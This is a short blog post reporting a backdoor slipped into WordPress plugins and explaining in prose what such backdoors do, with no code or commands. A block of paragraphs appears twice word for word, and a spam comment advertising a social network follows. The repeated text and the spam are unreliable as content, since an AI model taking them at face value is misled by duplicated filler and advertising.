WordPress plugins had a malicious backdoor added to them via the plugin repository. That lead to WordPress.org resetting all passwords as a precaution. You can read about it here: Passwords Reset. I must note that the WP.org team did a amazing job dealing with this incident and getting it all fixed very fast.
Plugins are a great place for the hacker to hide the code for three reasons. One because people don’t really look at them. Two because people don’t like to upgrade their plugins, so they survive the upgrades. Three, there are some poorly coded plugins which probably have their own vulnerabilities to begin with.
Backdoor is referred to a method of bypassing normal authentication and gaining the ability to remotely access the server while remaining undetected. Most smart hackers always upload the backdoor as the first thing.
Security researchers at Sucuri analyzed the plugin and found out that it is modified with a Backdoor which gives attackers full access to the server.
Backdoors simply allow users to create hidden admin username. Whereas the more complex backdoors can allow the hacker to execute any PHP code sent from the browser. Others have a full fledged UI that allows them to send emails as your server, execute SQL queries, and everything else they want to do.
The malicious code in the plugin replaces the index.php file with the malicious code retrieved from the attacker's server. So, when user visit the site, they either redirected to SPAM sites or to Exploit kits where it will infect the visitor's system.
Plugins are a great place for the hacker to hide the code for three reasons. One because people don’t really look at them. Two because people don’t like to upgrade their plugins, so they survive the upgrades. Three, there are some poorly coded plugins which probably have their own vulnerabilities to begin with.
Backdoor is referred to a method of bypassing normal authentication and gaining the ability to remotely access the server while remaining undetected. Most smart hackers always upload the backdoor as the first thing.
Security researchers at Sucuri analyzed the plugin and found out that it is modified with a Backdoor which gives attackers full access to the server.
Backdoors simply allow users to create hidden admin username. Whereas the more complex backdoors can allow the hacker to execute any PHP code sent from the browser. Others have a full fledged UI that allows them to send emails as your server, execute SQL queries, and everything else they want to do.
The malicious code in the plugin replaces the index.php file with the malicious code retrieved from the attacker's server. So, when user visit the site, they either redirected to SPAM sites or to Exploit kits where it will infect the visitor's system.
Dear All,
ReplyDeleteWe are going to introduce you a new and exciting world of social network.
FUNBOOK
Join now for free and be a part of this fast growing online social community. Enjoy the new features at one place.
Click Here to Join
or
feel free to contact us HERE
Your precious feedback is highly appreciated
Best of Luck